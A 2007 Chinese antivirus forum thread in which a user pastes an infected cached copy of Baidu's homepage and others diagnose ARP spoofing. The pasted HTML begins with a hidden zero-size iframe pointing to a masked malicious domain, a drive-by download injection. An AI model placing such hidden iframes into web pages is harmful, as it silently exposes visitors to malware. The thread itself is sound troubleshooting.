标题:
最新病毒求救!
[打印本页]
作者:
xulingyun
时间:
2007-10-8 11:44
标题:
最新病毒求救!
832823.cn 网络应用加速器
除了832823.cn网络加速器过还有一个木马程序
Trojan-Downloader.HTML.Agent.fl病毒一打开网页就出现提示说脚本病毒,都还是杀不了
咔吧杀步了微点也是
一打开网页就下载病毒怎么办啊
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\6DEL6NK1\
www.baidu
[1]
这是它的主要路径冒充baidu妈的
下面是原文“baidu[1].html” 的原文件 但是删了就又有了,无法删除啊!!
<iframe src='http://www.***.com' width=0 height=0></iframe> <html><head><title>百度一下,你就知道 </title><meta http-equiv=Content-Type content="text/html;charset=gb2312">
<style>body{margin:4px 0 4px 0;}img{border:0}td,p{font-size:12px}p{width:600px;margin:0;padding:0}.kw{font-family:Verdana;font-size:16px;height:1.78em;padding-top:2px;}
#b {width:600px;height:30px;padding-top:4px;color:#77c;font-size:12px;font-family:Arial}#b a{color:#77c;font-size:12px}
#usrbar{padding-right:10px;line-height:19px;font-size:12px;font-family:Arial;text-align:right;white-space:nowrap;margin-bottom:3px !important;margin-bottom:10px;}
.sb{height:2em;width:5.6em;font-size:14px;}#km{font-size:14px;height:50px;}a{font-family:arial}#km a{font-family:宋体}
#l{font-size:14px;font-family:arial;width:600px;text-align:left;margin-bottom:5px}
#l tr td{text-align:left;font-family:arial;}
#l tr td div{font-size:14px;margin-left:92px;width:22.1em;text-align:center;}</style><script>
function h(obj,url){obj.style.behavior='url(#default#homepage)';obj.setHomePage(url);}
function g(){var ls=location.search;if(ls.indexOf("q=")!=-1){try{var q=(ls.match(new RegExp("q=[^&$]*")).toString());document.f.wd.value=decodeURIComponent(q.substr(2));}catch(e){}}}
function s(o,p){if(document.f.wd.value.length>0){var oh=o.href;var qw=encodeURIComponent(document.f.wd.value);if(oh.indexOf("q=")!=-1){o.href=oh.replace(new RegExp("q=[^&$]*"),"q="+qw);}else{var s=p?"&":"?";o.href=o.href+s+"q="+qw};}}</script></head>
<body text=000000 link=0000cc vlink=0000cc alink=ff6600>
<div id="usrbar"><script language="JavaScript">document.write('<a href="http://passport.baidu.com/?login&tpl=mn&u='+escape(location.href)+'">登录</a>');</script></div>
<center><a href=http://hi.baidu.com/baidu target=_blank><img src=http://www.baidu.com/img/logo.gif width=174 height=59 alt="点此进入 百度空间" ></a><br><br><br><br>
<table border="0" cellpadding="0" cellspacing="0" id="l" ><tr><td><div><a href="http://news.baidu.com" onclick="return s(this);">新 闻</a> <strong>网 页</strong> <a href="http://post.baidu.com/f?ct=486539264&cm=58580&tn=baiduForumIndex" onclick="return s(this,1);">贴 吧</a> <a href="http://zhidao.baidu.com" onclick="return s(this);">知 道</a> <a href="http://mp3.baidu.com" onclick="return s(this);">MP3</a> <a href="http://image.baidu.com" onclick="return s(this);">图 片</a></div></td></table>
<table width=600 border=0 cellpadding=0 cellspacing=0><tr valign=top><td width=92></td><td height=62> <form name=f action=/s><input type=text name=wd class=kw size=36 maxlength=100><script>document.f.wd.focus();g()</script><input type=hidden name=cl value=3> <input type=submit value=百度一下 class=sb><br><br></form></td><td width=100><a href=/search/jiqiao.html>帮助</a><br><a href=/gaoji/advanced.html>高级</a></td></tr></table>
<p id=km> <a href="http://hi.baidu.com/">空间</a> | <a href="http://www.baidu.com/more/">更多>></a></p>
<p style=height:60px;> </p>
<p style=height:30px;><a onclick="h(this,'http://www.baidu.com')" href=http://utility.baidu.com/traf/click.php?id=215&url=http://www.baidu.com>把百度设为首页</a></p>
<p style=height:14px;><a href=http://jingjia.baidu.com/>企业推广</a> | <a href=http://top.baidu.com/>搜索风云榜</a> | <a href=/home.html>关于百度</a> | <a href=http://ir.baidu.com>About Baidu</a></p><p id=b>©2007 Baidu <a href=http://www.baidu.com/duty/>使用百度前必读</a> <a href=http://www.miibeian.gov.cn/ target=_blank>京ICP证030173号</a> <a href=http://www.hd315.gov.cn/beian/view.asp?bianhao=010202001092500412><img src=http://gimg.baidu.com/img/gs.gif></a></p></center></body></html>
<!--402828649e8e8cdc-->
[
Last edited by Legend on 2007-10-8 at 12:50
]
附件 1:
1.GIF
(2007-10-8 11:44, 24.46 K,下载次数: 46)
作者:
aidi
时间:
2007-10-8 11:53
是打开所有网站都这样提示吗?
开网页时注意看下浏览器下面地址栏处是否显示跳转到了其他的域名,或者在当前页面右键察看源代码看是否有<iefram ...语句的内容。
初步怀疑是arp欺骗引起。
作者:
xulingyun
时间:
2007-10-8 11:54
哦 我看看
作者:
xulingyun
时间:
2007-10-8 12:08
微点还是没有杀掉
[url]
www.***.com
[*/url] 居然连接这个网站晕的!!!
[
Last edited by Legend on 2007-10-8 at 12:51
]
作者:
Legend
时间:
2007-10-8 12:55
请勿在论坛里面直接贴出可疑病毒网址链接,为了避免其他网友误点,原可疑链接已做屏蔽处理。下次请直接发到
virus@micropoint.com.cn
我们会具体测试分析。
楼主的情况根据您提供的信息初步判断为您的网络中存在arp欺骗现象,推荐您使用微点软件安全防护与策略-传统防火墙设置中的mac地址绑定功能,绑定您的真实的网关的mac地址,并请同时联系您的局域网络管理人员,查找欺骗主机进行病毒查杀。
作者:
CBHENIN
时间:
2007-10-8 21:01
这个是什么网站??
居然冒充我可爱的百度。。
作者:
backhamchen
时间:
2007-10-8 23:41
哦 这么凶悍啊 卡巴都没办法 找到位置 试试手动挂它啊
作者:
zj163168
时间:
2007-10-9 09:17
aidi
的见解很对~~
如果在本机杀了无效的话,
极度有可能是ARP病毒,
病毒的根源在另一台电脑,
你是在局域网中上网不?
欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)
bbs.micropoint.com.cn
1.GIF (2007-10-8 11:44, 24.46 K,下载次数: 46)
